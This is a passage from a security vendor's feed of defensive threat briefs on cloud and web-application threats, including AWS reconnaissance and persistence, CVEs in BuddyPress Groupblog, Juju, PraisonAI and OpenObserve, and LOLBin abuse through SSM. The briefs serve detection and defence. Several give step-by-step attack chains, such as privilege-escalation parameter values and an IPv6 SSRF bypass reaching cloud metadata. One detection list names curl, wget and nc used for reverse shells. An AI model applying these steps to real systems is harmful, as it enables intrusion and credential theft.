<li>The attacker executes a script or tool that calls multiple S3 APIs (e.g., <code>GetBucketAcl</code>, <code>GetBucketPolicy</code>) to gather information about S3 buckets.</li>
<li>The tool iterates through a list of buckets, querying the configuration of each.</li>
<li>The attacker collects the responses from the S3 API calls, mapping out bucket names, permissions, and access control lists.</li>
<li>The attacker analyzes the collected data to identify potentially sensitive data or misconfigured buckets.</li>
<li>Based on the findings, the attacker may proceed to exfiltrate data from accessible buckets (T1530).</li>
<li>The attacker may also attempt to modify bucket policies or access controls to gain further access or persistence.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful reconnaissance of S3 bucket configurations allows attackers to identify vulnerable buckets, potentially leading to data breaches or unauthorized access to sensitive information. The source material does not provide specific victim counts or sectors. However, the impact can range from exposure of confidential data to full compromise of the AWS environment, depending on the level of access gained and the sensitivity of the data stored in the targeted buckets. Identifying the activity early can prevent further exploitation.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the provided Sigma rule to your SIEM to detect rapid S3 bucket posture API calls (see: &ldquo;AWS S3 Rapid Bucket Enumeration&rdquo;).</li>
<li>Review IAM policies and enforce least privilege on S3 read APIs to limit the scope of potential reconnaissance activities.</li>
<li>Monitor CloudTrail logs for the same <code>aws.cloudtrail.user_identity.arn</code> and <code>source.ip</code> within approximately ±30 minutes for follow-on patterns such as <code>ListBuckets</code>, <code>GetObject</code>, <code>PutBucketPolicy</code>, or <code>AssumeRole</code> activities (see Overview).</li>
<li>Rotate or disable keys for the affected identity, revoke active role sessions where possible, and restrict the source IP at the network layer if it is not authorized (see Overview).</li>
<li>Whitelist approved scanning accounts and tune the Sigma rule to reduce noise from those identities (see Overview).</li>
</ul>
]]></content:encoded><category domain="severity">low</category><category domain="type">advisory</category><category>cloud</category><category>aws</category><category>s3</category><category>reconnaissance</category></item><item><title>BuddyPress Groupblog Plugin Privilege Escalation Vulnerability (CVE-2026-5144)</title><link>https://feed.craftedsignal.io/briefs/2026-04-buddypress-privesc/</link><pubDate>Sat, 11 Apr 2026 02:19:36 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-buddypress-privesc/</guid><description>The BuddyPress Groupblog plugin for WordPress is vulnerable to privilege escalation (CVE-2026-5144), allowing a low-privileged user to gain administrator access on a WordPress Multisite network by manipulating group blog settings.</description><content:encoded><![CDATA[<p>The BuddyPress Groupblog plugin, versions 1.9.3 and below, contains a critical privilege escalation vulnerability (CVE-2026-5144). This flaw allows authenticated attackers with minimal privileges (Subscriber or higher) to escalate privileges to Administrator on the main WordPress Multisite site. The vulnerability stems from a lack of authorization checks in the group blog settings handler. Specifically, the plugin improperly validates the <code>groupblog-blogid</code>, <code>default-member</code>, and <code>groupblog-silent-add</code> parameters. This vulnerability allows an attacker to associate their group with the main site (blog ID 1) and automatically assign the &lsquo;administrator&rsquo; role to new group members. Successful exploitation grants attackers full control over the WordPress Multisite network, posing a significant risk to data confidentiality, integrity, and availability.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker creates a new group on the WordPress Multisite network with a Subscriber account.</li>
<li>Attacker accesses the group&rsquo;s settings page.</li>
<li>Attacker modifies the <code>groupblog-blogid</code> parameter, setting it to &ldquo;1&rdquo; to associate the group with the main site. This is done by crafting a malicious HTTP POST request to the group settings handler.</li>
<li>The attacker modifies the <code>default-member</code> parameter to &ldquo;administrator&rdquo;. This parameter controls the default role assigned to new members.</li>
<li>The attacker enables the <code>groupblog-silent-add</code> parameter. This setting automatically adds new group members to the associated blog (main site) with the specified default role (administrator).</li>
<li>Attacker creates a second user account or convinces another user to join their malicious group.</li>
<li>When the new user joins the attacker&rsquo;s group, the <code>groupblog-silent-add</code> setting automatically adds the new user to the main site with the administrator role.</li>
<li>The attacker (via the new user account) now has administrator access to the main WordPress Multisite site.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-5144 grants an attacker complete control over the targeted WordPress Multisite network. This allows them to modify content, install malicious plugins, create new administrator accounts, and potentially compromise the underlying server. The impact is especially severe for organizations relying on WordPress Multisite for critical applications, as it can lead to data breaches, service disruptions, and significant financial losses. The vulnerability affects all installations using the BuddyPress Groupblog plugin up to version 1.9.3, potentially impacting thousands of websites.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Immediately update the BuddyPress Groupblog plugin to a version greater than 1.9.3 to patch CVE-2026-5144.</li>
<li>Monitor web server logs for POST requests to <code>/wp-admin/options.php</code> with parameters <code>groupblog-blogid</code>, <code>default-member</code>, and <code>groupblog-silent-add</code> to detect potential exploitation attempts, using the provided Sigma rule.</li>
<li>Implement strict access control policies to limit the ability of low-privileged users to modify group settings and install plugins.</li>
<li>Enable logging of user role changes to detect unauthorized privilege escalation attempts.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>wordpress</category><category>buddypress</category><category>privilege-escalation</category><category>cve-2026-5144</category><category>cloud</category></item><item><title>AWS STS GetCallerIdentity API Called for the First Time</title><link>https://feed.craftedsignal.io/briefs/2024-10-aws-sts-getcalleridentity/</link><pubDate>Fri, 10 Apr 2026 16:48:32 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-10-aws-sts-getcalleridentity/</guid><description>An adversary with access to compromised AWS credentials may attempt to verify their validity and determine the account they are using by calling the STS GetCallerIdentity API, potentially indicating credential compromise and unauthorized discovery activity.</description><content:encoded><![CDATA[<p>The AWS Security Token Service (STS) GetCallerIdentity API allows a user to retrieve information about the IAM user or role associated with the credentials being used. While a legitimate user should already know the account they are operating in, an attacker with compromised credentials may use this API to verify the validity of the credentials and enumerate account details. This activity, especially when observed for the first time from a particular user identity, can indicate malicious reconnaissance. This detection focuses on identifying the initial use of the GetCallerIdentity API, excluding instances where an assumed role is involved due to the common practice of using GetCallerIdentity after assuming a role. This event is flagged as anomalous, potentially signaling unauthorized access or credential misuse within an AWS environment.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains unauthorized access to AWS credentials, either through phishing, credential stuffing, or compromised systems.</li>
<li>The attacker uses the compromised credentials to authenticate to the AWS environment.</li>
<li>The attacker executes the <code>sts:GetCallerIdentity</code> API call to identify the associated AWS account ID, IAM user, or role.</li>
<li>The AWS STS service processes the request and returns the identity information to the attacker.</li>
<li>The attacker analyzes the returned identity information to understand the scope and privileges of the compromised credentials.</li>
<li>The attacker uses the gathered information to perform further reconnaissance activities, such as identifying accessible resources and services.</li>
<li>Based on the discovered information, the attacker may attempt to escalate privileges or move laterally within the AWS environment.</li>
<li>The final objective could include data exfiltration, deployment of malicious workloads, or disruption of services.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation and undetected reconnaissance can lead to significant damage, including unauthorized access to sensitive data, compromised workloads, and disruption of critical services. The impact can range from data breaches and financial losses to reputational damage and regulatory fines. Depending on the scope of the compromised credentials, the attacker may be able to access and control a large portion of the AWS environment. In the event of a breach, the organization may incur costs related to incident response, data recovery, and legal settlements.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;AWS STS GetCallerIdentity API Called for the First Time by New Identity&rdquo; to your SIEM and tune for your environment to detect anomalous usage of the GetCallerIdentity API.</li>
<li>Investigate any alerts generated by the Sigma rule, focusing on identifying the source IP address, user agent, and the user identity associated with the API call.</li>
<li>Review IAM permission policies for the user identity associated with the GetCallerIdentity API call to ensure the least privilege principle is followed.</li>
<li>Enable AWS CloudTrail logging for all AWS regions in your account to ensure comprehensive event logging, as required by the detection rule.</li>
<li>Consider adding exceptions based on <code>user.id</code> or <code>aws.cloudtrail.user_identity.arn</code> values for automation workflows that legitimately rely on the GetCallerIdentity API, as mentioned in the overview.</li>
<li>Implement multi-factor authentication (MFA) for all IAM users to mitigate the risk of credential compromise, as suggested in the documentation.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>cloud</category><category>aws</category><category>sts</category><category>discovery</category></item><item><title>Multiple Cloud Secrets Accessed by Single Source IP</title><link>https://feed.craftedsignal.io/briefs/2024-02-multi-cloud-secrets-access/</link><pubDate>Fri, 10 Apr 2026 16:27:52 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-02-multi-cloud-secrets-access/</guid><description>A single source IP accessing secret-management APIs across multiple cloud providers (AWS, GCP, Azure) and Kubernetes clusters within a short timeframe indicates potential credential theft, session hijacking, or token replay.</description><content:encoded><![CDATA[<p>This threat brief focuses on the detection of potential credential compromise and abuse in multi-cloud environments. The core issue is the observation of a single source IP address accessing secret stores across multiple cloud providers (AWS Secrets Manager, Google Secret Manager, Azure Key Vault) and Kubernetes clusters within a short timeframe. This behavior, detected by the Elastic rule &ldquo;Multiple Cloud Secrets Accessed by Source Address&rdquo; published on 2026-04-10, is indicative of an adversary attempting to harvest secrets using stolen credentials, hijacked sessions, or replayed tokens. The rule is designed to identify anomalous cross-cloud secret retrieval, which is uncommon in legitimate multi-cloud orchestration scenarios. Defenders need to identify the source IP, the accessed secrets, and potential compromise scope to mitigate the threat effectively.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li><strong>Initial Access:</strong> Adversary gains access to valid credentials or session tokens through various means like phishing, malware, or exposed credentials. (T1555, T1566)</li>
<li><strong>Authentication:</strong> Adversary uses the compromised credentials or tokens to authenticate to one of the cloud provider&rsquo;s API (AWS, Azure, GCP).</li>
<li><strong>Discovery (AWS):</strong> The adversary leverages the AWS CLI or API to enumerate available secrets stored in AWS Secrets Manager using <code>GetSecretValue</code> API calls.</li>
<li><strong>Discovery (Azure):</strong> The adversary uses compromised credentials to interact with Azure Key Vault, utilizing <code>SecretGet</code> or <code>KeyGet</code> actions to discover accessible secrets.</li>
<li><strong>Discovery (GCP):</strong> The adversary uses compromised service account or user credentials to access Google Secret Manager and enumerate accessible secrets using <code>google.cloud.secretmanager.v1.SecretManagerService.AccessSecretVersion</code> or <code>google.cloud.secretmanager.v1.SecretManagerService.GetSecretRequest</code>.</li>
<li><strong>Discovery (Kubernetes):</strong> The adversary uses compromised credentials to access the Kubernetes API and enumerate secrets within the cluster, specifically targeting the <code>secrets</code> resource with <code>get</code> or <code>list</code> verbs.</li>
<li><strong>Credential Access:</strong> The adversary retrieves the secret values from each cloud provider and Kubernetes cluster. (T1555.006)</li>
<li><strong>Exfiltration/Lateral Movement:</strong> The adversary exfiltrates the retrieved secrets for further malicious activities, such as lateral movement within the cloud environments or unauthorized access to sensitive data.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>A successful attack can lead to the exfiltration of sensitive data, including API keys, database passwords, and encryption keys. This could result in unauthorized access to critical systems and data, potentially leading to data breaches, financial loss, and reputational damage. The impact is amplified in multi-cloud environments as the adversary can leverage the compromised secrets to move laterally between different cloud providers, increasing the scope and severity of the attack.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the provided Sigma rule &ldquo;Multiple Cloud Secrets Accessed by Source Address&rdquo; to your SIEM to detect this activity across your cloud environments. Enable required logging: GCP Audit DATA_READ for Secret Manager API, Azure Key Vault Diagnostic Logging, and AWS CloudTrail for Secrets Manager.</li>
<li>Investigate any alerts triggered by the Sigma rule by validating the principal (user, service account) and reviewing related activity (authentication, privilege escalation). Check application context, user agent, and IP reputation as detailed in the rule&rsquo;s triage steps.</li>
<li>Restrict or disable affected credentials or service accounts and rotate all accessed secrets if the activity is unauthorized or suspicious, as described in the rule&rsquo;s Response and Remediation steps.</li>
<li>Harden identity security by enforcing MFA, reducing permissions to least privilege, and reviewing trust relationships. Audit visibility should be improved by ensuring logging is enabled across all cloud environments.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>credential-access</category><category>cloud</category><category>kubernetes</category></item><item><title>AWS SSM Command Document Created by Rare User</title><link>https://feed.craftedsignal.io/briefs/2024-11-aws-ssm-rare-user/</link><pubDate>Fri, 10 Apr 2026 16:27:52 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-11-aws-ssm-rare-user/</guid><description>An AWS Systems Manager (SSM) command document creation by a user or role who does not typically perform this action, which can lead to unauthorized access, command and control, or data exfiltration.</description><content:encoded><![CDATA[<p>This rule identifies when an AWS Systems Manager (SSM) command document is created by a user or role who does not typically perform this action. The rule focuses on detecting anomalous creation of SSM command documents. Adversaries may create SSM command documents to execute commands on managed instances, potentially leading to unauthorized access, command and control, and data exfiltration. The rule utilizes AWS CloudTrail logs to monitor the <code>CreateDocument</code> API call within the SSM service. This activity is flagged when the user or role creating the document deviates from established patterns, indicating a potential security risk. This detection is relevant for organizations using AWS SSM for managing their infrastructure and aims to prevent unauthorized command execution on managed instances.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains initial access to an AWS account, potentially through compromised credentials or an exposed IAM role.</li>
<li>The attacker attempts to create a new SSM Command document using the <code>CreateDocument</code> API call.</li>
<li>The <code>CreateDocument</code> API call is logged by AWS CloudTrail with details about the user identity, request parameters, and document description.</li>
<li>The detection rule analyzes CloudTrail logs, specifically looking for the <code>CreateDocument</code> event with a document type of <code>Command</code>.</li>
<li>The rule identifies the user or role associated with the <code>CreateDocument</code> API call by inspecting the <code>aws.cloudtrail.user_identity.arn</code> field.</li>
<li>If the user or role is considered rare or unusual for creating SSM Command documents within the organization, the rule triggers an alert.</li>
<li>The attacker could then use the created document to execute arbitrary commands on managed instances.</li>
<li>Successful execution of these commands leads to various impacts, including unauthorized access, command and control, data exfiltration, or disruption of services.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The successful exploitation of this technique can lead to unauthorized access to AWS resources, potentially affecting all systems managed by AWS SSM in the targeted environment. The creation of malicious SSM command documents can lead to data exfiltration, system compromise, or denial of service. If successful, this can impact hundreds or thousands of systems depending on the scope of AWS SSM usage in the organization.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;AWS SSM Command Document Created by Rare User&rdquo; to your SIEM, ensuring proper indexing of CloudTrail logs (index = [&ldquo;filebeat-*&rdquo;, &ldquo;logs-aws.cloudtrail-*&rdquo;]).</li>
<li>Review the <code>aws.cloudtrail.request_parameters.content</code> field in the CloudTrail logs for any suspicious commands within the created SSM document.</li>
<li>Restrict SSM document creation permissions to specific, trusted roles or users to prevent unauthorized document creation as mentioned in the overview.</li>
<li>Monitor the <code>SendCommand</code> API call related to the created SSM document to see if it is used to execute commands on managed instances, as described in the triage section.</li>
</ul>
]]></content:encoded><category domain="severity">low</category><category domain="type">advisory</category><category>cloud</category><category>aws</category><category>ssm</category><category>execution</category></item><item><title>AWS IAM Login Profile Added for Root</title><link>https://feed.craftedsignal.io/briefs/2024-12-aws-root-login-profile/</link><pubDate>Fri, 10 Apr 2026 16:27:52 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-12-aws-root-login-profile/</guid><description>An adversary with temporary root access in AWS may create a login profile for the root account to establish persistent console access, even if the original access keys are rotated or disabled.</description><content:encoded><![CDATA[<p>This rule detects the creation of a console login profile for the AWS account root user, a highly privileged account. While <code>CreateLoginProfile</code> is normally applied to IAM users, when executed from a temporary root session (e.g., via <code>AssumeRoot</code>) without specifying a <code>userName</code>, the profile is created for the root principal. This activity is especially concerning because it provides persistent access. An attacker gaining temporary root access via STS or credential compromise might exploit this to set a root password. The attacker can then use this new password to log in through the console. This method circumvents traditional access key rotation or disabling and can be employed even after the initial vulnerability is patched. This activity started being tracked on 2024-12-02, defenders need to be aware of this persistence mechanism and promptly investigate any such incidents.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains initial access to an AWS account with sufficient privileges, possibly through compromised credentials or an STS session.</li>
<li>The attacker executes the <code>AssumeRoot</code> API call to assume the privileges of the root user.</li>
<li>The attacker uses the <code>CreateLoginProfile</code> API call without specifying a <code>userName</code>. This action creates a console login profile directly for the root account instead of an IAM user. The <code>aws.cloudtrail.request_parameters</code> will not contain <code>userName=</code>.</li>
<li>The attacker sets a password for the root account using the <code>CreateLoginProfile</code> API. <code>passwordResetRequired</code> might be set to <code>true</code> or omitted, with omission potentially indicating an attacker-controlled password.</li>
<li>The attacker uses the newly created root account password to log in to the AWS Management Console. The event will be logged as a <code>ConsoleLogin</code> event.</li>
<li>The attacker uses the root account&rsquo;s privileges to create or modify resources, escalate privileges, or exfiltrate data.</li>
<li>The attacker maintains persistence by using the console login, even if the initially compromised credentials or temporary session tokens are revoked.</li>
<li>The attacker may also create new IAM users or roles with elevated permissions to further solidify their presence.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>A successful attack can lead to complete control over the AWS environment. The attacker can create, modify, or delete resources; access sensitive data; and disrupt services. Because the root user has unrestricted privileges, the impact is extremely high. There have been no reported victim counts. However, any successful exploitation can have severe impacts including data breaches, financial loss, and reputational damage.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;AWS IAM Login Profile Added for Root&rdquo; to detect unauthorized creation of login profiles for the root account and tune for your environment.</li>
<li>Investigate any <code>CreateLoginProfile</code> events where <code>aws.cloudtrail.user_identity.type</code> is <code>Root</code> and <code>aws.cloudtrail.request_parameters</code> does not contain <code>userName=</code>.</li>
<li>Enable CloudTrail, GuardDuty, AWS Config, and Security Hub across all regions for continuous monitoring of root and IAM activity to improve overall visibility.</li>
<li>Review IAM policies for least-privilege adherence, focusing on <code>iam:CreateLoginProfile</code>, <code>iam:UpdateLoginProfile</code>, and <code>iam:CreateAccessKey</code> permissions.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cloud</category><category>aws</category><category>iam</category><category>persistence</category></item><item><title>AWS EC2 LOLBin Execution via SSM SendCommand</title><link>https://feed.craftedsignal.io/briefs/2024-01-03-aws-ec2-lolbin-ssm/</link><pubDate>Fri, 10 Apr 2026 16:27:52 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-03-aws-ec2-lolbin-ssm/</guid><description>Detection of Living Off the Land Binaries (LOLBins) or GTFOBins execution on EC2 instances via AWS Systems Manager (SSM) SendCommand API, potentially indicating malicious activity.</description><content:encoded><![CDATA[<p>This threat brief focuses on detecting the execution of Living Off the Land Binaries (LOLBins) or GTFOBins on Amazon EC2 instances via AWS Systems Manager (SSM) <code>SendCommand</code> API. The technique involves correlating AWS CloudTrail <code>SendCommand</code> events with endpoint process execution by matching SSM command IDs. While AWS redacts command parameters in CloudTrail logs, this correlation technique reveals the actual commands executed on EC2 instances. This is critical because adversaries may abuse SSM to execute malicious commands remotely without requiring SSH or RDP access. They can leverage legitimate system utilities for various malicious purposes, including data exfiltration, establishing reverse shells, or facilitating lateral movement within the cloud environment. The rule was last updated on 2026-04-10.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains initial access to AWS via compromised credentials or an exposed IAM role.</li>
<li>The attacker uses the AWS CLI or API to initiate an SSM <code>SendCommand</code> to a target EC2 instance. The <code>DocumentName</code> parameter is set to <code>AWS-RunShellScript</code>.</li>
<li>The SSM agent on the EC2 instance receives the <code>SendCommand</code> request.</li>
<li>The SSM agent executes a shell script (<code>_script.sh</code>) within a dedicated directory for orchestration.</li>
<li>The shell script executes a LOLBin, such as <code>curl</code>, <code>wget</code>, <code>python</code>, or <code>perl</code>, to perform malicious actions. The parent process of the LOLBin will be the SSM shell script.</li>
<li>The LOLBin is used to download a malicious payload, establish a reverse shell, or exfiltrate data.</li>
<li>The attacker uses the established reverse shell to perform further actions on the EC2 instance.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation can lead to unauthorized access to EC2 instances, data exfiltration, deployment of malware, and lateral movement within the AWS environment. Although a number of impacted organizations is not available, this attack is able to bypass traditional network security controls. Organizations in any sector utilizing AWS EC2 instances and SSM are potentially at risk. The lack of required SSH or RDP access makes this technique particularly stealthy.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Enable AWS CloudTrail logging to capture <code>SendCommand</code> events and monitor for <code>AWS-RunShellScript</code> in the <code>request_parameters</code>.</li>
<li>Deploy the Sigma rule &ldquo;Detect AWS EC2 LOLBin Execution via SSM SendCommand&rdquo; to your SIEM and tune for your environment.</li>
<li>Monitor endpoint process execution logs for the execution of LOLBins like <code>curl</code>, <code>wget</code>, <code>python</code>, <code>perl</code>, <code>nc</code>, etc., with parent processes related to SSM.</li>
<li>Implement strict IAM policies to restrict SSM <code>SendCommand</code> permissions to only authorized users and roles.</li>
<li>Review and audit existing SSM configurations to identify and remediate any overly permissive settings.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>aws</category><category>ec2</category><category>ssm</category><category>lolbin</category><category>execution</category><category>cloud</category></item><item><title>Juju CloudSpec API Authorization Bypass (CVE-2026-5412)</title><link>https://feed.craftedsignal.io/briefs/2026-04-juju-auth-bypass/</link><pubDate>Fri, 10 Apr 2026 13:16:45 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-juju-auth-bypass/</guid><description>CVE-2026-5412 describes an authorization issue in Juju versions prior to 2.9.57 and 3.6.21, where a low-privileged authenticated user can call the CloudSpec API method to extract cloud credentials used to bootstrap the controller, leading to sensitive credential exposure.</description><content:encoded><![CDATA[<p>CVE-2026-5412 identifies an authorization bypass vulnerability affecting Juju, an open-source service orchestration tool. Specifically, versions prior to 2.9.57 and 3.6.21 are susceptible. An authenticated user with low privileges can exploit this vulnerability by invoking the CloudSpec API method. This method, intended for controller bootstrapping, inadvertently exposes sensitive cloud credentials when accessed by unauthorized users. Successful exploitation grants access to the credentials used to manage the cloud environment where Juju is deployed. This poses a significant risk, potentially allowing attackers to compromise the entire cloud infrastructure managed by the vulnerable Juju controller. Defenders should prioritize patching vulnerable Juju deployments.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker authenticates to the Juju controller with a low-privileged account.</li>
<li>The attacker crafts a malicious API request to the <code>CloudSpec</code> method.</li>
<li>The Juju controller, lacking proper authorization checks, processes the request.</li>
<li>The <code>CloudSpec</code> method retrieves the cloud credentials used for bootstrapping.</li>
<li>The controller returns the cloud credentials to the attacker.</li>
<li>Attacker obtains the sensitive cloud credentials, such as AWS access keys or Azure service principal secrets.</li>
<li>The attacker uses the stolen cloud credentials to access and control cloud resources.</li>
<li>Attacker achieves complete compromise of the cloud environment.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-5412 allows a low-privileged, authenticated attacker to steal cloud credentials. This can lead to complete compromise of the cloud infrastructure managed by the vulnerable Juju controller. The impact includes unauthorized access to data, potential data breaches, denial of service, and the ability to deploy malicious workloads within the cloud environment. The severity is heightened by the ease of exploitation and the high value of the exposed cloud credentials.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade Juju controllers to versions 2.9.57 or 3.6.21 to remediate CVE-2026-5412.</li>
<li>Implement the Sigma rule &ldquo;Detect Juju CloudSpec API Access&rdquo; to detect unauthorized calls to the CloudSpec API method in Juju environments.</li>
<li>Monitor Juju controller logs for suspicious API requests originating from low-privileged accounts.</li>
<li>Review and enforce strict access control policies within the cloud environment to limit the impact of compromised credentials.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>vulnerability</category><category>authorization</category><category>cloud</category></item><item><title>PraisonAI Unauthenticated WebSocket Allows Resource Exhaustion</title><link>https://feed.craftedsignal.io/briefs/2026-04-praisonai-websocket-vuln/</link><pubDate>Thu, 09 Apr 2026 22:16:35 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-praisonai-websocket-vuln/</guid><description>PraisonAI before version 4.5.128 is vulnerable to resource exhaustion and API credit draining due to the `/media-stream` WebSocket endpoint accepting unauthenticated connections, allowing attackers to exhaust server resources and drain OpenAI API credits.</description><content:encoded><![CDATA[<p>PraisonAI, a multi-agent teams system, contains a vulnerability in versions prior to 4.5.128 that exposes the <code>/media-stream</code> WebSocket endpoint in its call module. This endpoint lacks authentication or Twilio signature validation, allowing any client to establish a connection. Each successful connection initiates an authenticated session to OpenAI&rsquo;s Realtime API, utilizing the server&rsquo;s API key. Due to the absence of rate limits, connection limits, or message size restrictions, a malicious actor can exploit this vulnerability by creating numerous concurrent connections. This can lead to the exhaustion of server resources and a significant drain on the victim&rsquo;s OpenAI API credits. This vulnerability is addressed and patched in version 4.5.128.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker identifies a PraisonAI instance running a vulnerable version (prior to 4.5.128).</li>
<li>Attacker establishes a WebSocket connection to the <code>/media-stream</code> endpoint of the PraisonAI instance without providing any authentication credentials.</li>
<li>The PraisonAI server, upon receiving the unauthenticated WebSocket connection, creates an authenticated session with the OpenAI Realtime API using its own API key.</li>
<li>Attacker sends a large volume of messages through the WebSocket connection, exploiting the lack of message rate limits.</li>
<li>Attacker initiates multiple concurrent WebSocket connections to the <code>/media-stream</code> endpoint.</li>
<li>The PraisonAI server becomes overloaded due to the excessive number of connections and message processing demands.</li>
<li>The victim&rsquo;s OpenAI API credits are rapidly depleted as the PraisonAI server processes requests from the attacker&rsquo;s connections.</li>
<li>The PraisonAI server experiences degraded performance or becomes completely unresponsive, impacting legitimate users.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability results in resource exhaustion on the PraisonAI server, potentially causing denial of service for legitimate users. Furthermore, it leads to the unauthorized consumption of the victim&rsquo;s OpenAI API credits, resulting in unexpected charges and potential disruption of services reliant on the OpenAI API. The number of affected organizations depends on the prevalence of vulnerable PraisonAI instances deployed.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade PraisonAI installations to version 4.5.128 or later to patch CVE-2026-40116.</li>
<li>Implement rate limiting on WebSocket connections to the <code>/media-stream</code> endpoint to mitigate resource exhaustion.</li>
<li>Monitor OpenAI API usage for unexpected spikes in activity that may indicate exploitation of this vulnerability.</li>
<li>Deploy the Sigma rule <code>DetectSuspiciousPraisonAIWebSocketConnections</code> to identify potential exploitation attempts by detecting a high number of connections to the <code>/media-stream</code> endpoint.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cve-2026-40116</category><category>resource-exhaustion</category><category>websocket</category><category>api-abuse</category><category>cloud</category></item><item><title>OpenObserve SSRF via Improper IPv6 Validation</title><link>https://feed.craftedsignal.io/briefs/2024-01-30-openobserve-ssrf/</link><pubDate>Tue, 07 Apr 2026 20:16:29 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-30-openobserve-ssrf/</guid><description>OpenObserve versions 0.70.3 and earlier are vulnerable to a server-side request forgery (SSRF) attack due to improper validation of IPv6 addresses in the validate_enrichment_url function, potentially allowing authenticated attackers to access internal services and retrieve sensitive cloud metadata.</description><content:encoded><![CDATA[<p>OpenObserve, a cloud-native observability platform, contains a server-side request forgery (SSRF) vulnerability (CVE-2026-39361) in versions 0.70.3 and earlier. The vulnerability resides in the <code>validate_enrichment_url</code> function within <code>src/handler/http/request/enrichment_table/mod.rs</code>. This function fails to properly block IPv6 addresses due to the Rust&rsquo;s <code>url</code> crate returning IPv6 addresses with surrounding brackets (e.g., &ldquo;[::1]&rdquo;) instead of without. This allows an authenticated attacker to bypass intended restrictions and access internal services that are normally blocked from external access. Successful exploitation can lead to the retrieval of sensitive IAM credentials via AWS IMDSv1 (169.254.169.254), GCP metadata, or Azure IMDS on cloud deployments, and probing of internal network services on self-hosted deployments.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An authenticated attacker identifies the <code>validate_enrichment_url</code> function as a potential SSRF target.</li>
<li>The attacker crafts a malicious URL containing an IPv6 address with surrounding brackets (e.g., <code>http://[::1]</code>).</li>
<li>The attacker submits a request to the OpenObserve server, providing the malicious URL to the <code>validate_enrichment_url</code> function.</li>
<li>The <code>validate_enrichment_url</code> function fails to properly validate the IPv6 address due to the brackets.</li>
<li>The OpenObserve server initiates a request to the attacker-specified IPv6 address, bypassing intended access restrictions.</li>
<li>In a cloud environment, the attacker targets the AWS IMDSv1 endpoint (169.254.169.254) to retrieve IAM credentials.</li>
<li>The OpenObserve server retrieves the IAM credentials from the IMDSv1 endpoint and returns them to the attacker.</li>
<li>The attacker uses the stolen IAM credentials to gain unauthorized access to cloud resources.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability can lead to significant consequences, especially in cloud deployments. An attacker can retrieve sensitive IAM credentials from cloud metadata services like AWS IMDSv1 (169.254.169.254), GCP metadata, or Azure IMDS. These stolen credentials can then be used to gain unauthorized access to critical cloud resources, potentially leading to data breaches, service disruption, and financial losses. The vulnerability affects OpenObserve instances version 0.70.3 and earlier. The number of affected organizations is currently unknown, but any organization using a vulnerable version of OpenObserve is at risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade OpenObserve to a version greater than 0.70.3 to patch CVE-2026-39361.</li>
<li>Monitor network connections originating from OpenObserve servers to internal IP addresses such as 169.254.169.254 using the provided Sigma rule to detect potential SSRF attempts.</li>
<li>Implement network segmentation and access controls to limit the impact of a successful SSRF attack, restricting access from OpenObserve servers to sensitive internal services.</li>
<li>Consider disabling IMDSv1 and migrating to IMDSv2 on AWS EC2 instances to mitigate the risk of IAM credential theft.</li>
</ul>
